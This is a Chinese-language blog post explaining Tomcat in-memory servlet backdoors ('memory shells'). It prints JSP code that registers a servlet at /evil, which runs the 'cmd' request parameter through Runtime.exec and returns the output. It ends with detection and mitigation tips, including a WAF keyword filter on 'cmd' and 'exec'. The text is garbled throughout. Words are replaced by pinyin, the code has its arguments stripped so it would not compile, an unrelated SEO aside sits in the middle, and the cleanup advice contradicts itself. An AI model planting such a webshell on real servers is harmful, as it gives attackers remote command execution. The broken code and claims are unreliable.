嘿，朋友！你有没有听说过“内存马”？听起来像是个奇怪的玩具，但它其实是一种偷偷潜入系统、在内存里跑的恶意代码。今天咱们聊聊：Tomcat 的 Servlet 里Neng藏住内存马吗？

想象一下你把一只小狗放进了一个安全的笼子里。它没有留下任何脚印，却Neng随时蹭到主人的怀里偷吃零食。那就是典型的内存马。

它不是写文件也不是改配置，而是直接在运行时把自己的代码注入到进程里。只要 JVM 在跑，它就Neng一直活着。

说实话，这种手段hen酷也hen危险。要想让人防不胜防，就得搞懂它怎么进来。

Tomcat 就是 Java 世界里的 HTTP 服务器，它Zui核心的工作是托管 Servlet。每个 Web 应用dou有一个上下文，里面装着若干个 Servlet、Filter、Listener 等组件。

当你访问 /hello 时请求会先经过 Filter 链，然后到达匹配 /hello 的 Servlet，Zui终返回响应。

通常我们dou把 Servlet 写成 .java 文件，编译后放进 WEB-INF/classes 或者打成 .war 再部署。攻击者可没这么麻烦——他们利用 Tomcat 提供的动态注册 API：ServletContext.addServlet.

这句话kan起来普通，但背后隐藏了大招：

AddServlet: 直接传一个实例；

AddServlet: 把类交给容器反射创建。

我们geng倾向用第一个方式，因为Ke以写匿名内部类，把命令执行逻辑塞进去。

%@ page import="javax.servlet.*"
%@ page import="javax.servlet.http.*"
%@ page import="java.io.*"
Servlet evil = new HttpServlet {
    protected void doGet(HttpServletRequest req,
                          HttpServletResponse resp) throws IOException {
        String cmd = req.getParameter;
        if {
            Process p = Runtime.getRuntime.exec;
            InputStream in = p.getInputStream;
            byte buf = new byte;
            int len;
            while)!=-1){
                resp.getWriter.write);
            }
            return;
        }
        resp.getWriter.write;
    }
    protected void doPost(HttpServletRequest req,
                          HttpServletResponse resp) throws IOException {
        doGet;
    }
};
servletContext.addServlet.addMapping;
out.println;

你kan，没有任何文件落地——整个过程dou在内存里完成。只要 Tomcat 没重启，这条后门永远有效。

Ru果你搜索 “Tomcat 内存马”，可Neng拿不到hen多结果。这原因之一是：

Baidu 对技术细节过度堆砌的内容评价低；

关键词重复太多导致算法判定为垃圾内容；

文章缺乏外链和用户互动，也容易被降权。

所以Ru果想让读者真正找到这类信息，可多加点案例、图解或实战演练，让内容geng“人气”。哈哈！

A. 攻击者通过 JSP 或Yi存在的管理接口触发动态注册； B. 容器接收请求，将匿名 Servet 放进上下文； C. 第一次访问 /evil 时触发 init; D. 随后每次 GET/POST 到 /evil 时执行 doGet/doPost； E. 参数 cmd 按需调用 Runtime.exec; Z. 输出结果直接返回浏览器。

注意：Ru果应用开启了 SecurityManager 或限制了 exec 权限，这一步会失败。不过大多数生产环境默认没开启这些限制，漏洞依旧可行。

"我到底有没有注入": 检查 web.xml 和所有 .class 文件是否含有异常路径或未声明的映射；但记住——我们的恶意代码根本没写到文件系统，只在内存里。所以传统扫描往往抓不到。

"日志可疑": 查kan access.log，kan是否出现 /evil 或其他未知路径的请求。Ru果发现频繁访问且返回系统信息，hen可Neng是后门。

"监控启动事件": 在 Tomcat 启动时打印 Context 内部结构来比对是否出现新加入的 Wrapper 对象；若发现异常名称，则可Neng存在隐蔽注入。

"Zui稳妥": 给所有公开接口加上 CSRF 防护、IP 白名单或双因素认证，并使用 Web Application Firewall过滤非法请求参数，如包含关键字 cmd、exec 等字样。

"重启杀死一切": 一旦发现后门，即刻重启 Tomcat 并彻底清理应用目录，再重新部署可信版本。因为在重启之前，恶意实例Yi经被 GC 清除，但容器仍保留映射表，需要手动删掉或重新加载配置才Neng彻底消失。

老友们，一句话：**不要小kan任何一次动态注册** —— 它既Ke以带来便利，也可Neng给黑客打开窗口。平时Zuo好权限管理、日志审计和及时补丁geng新，是抵御这种“内存马”的根本办法。希望今天这篇轻松分享Neng帮你识破那些潜伏在 Servlet 后面的黑暗面哦！Ru果还有疑问，随时来聊，我可不会端架子，一起探讨吧～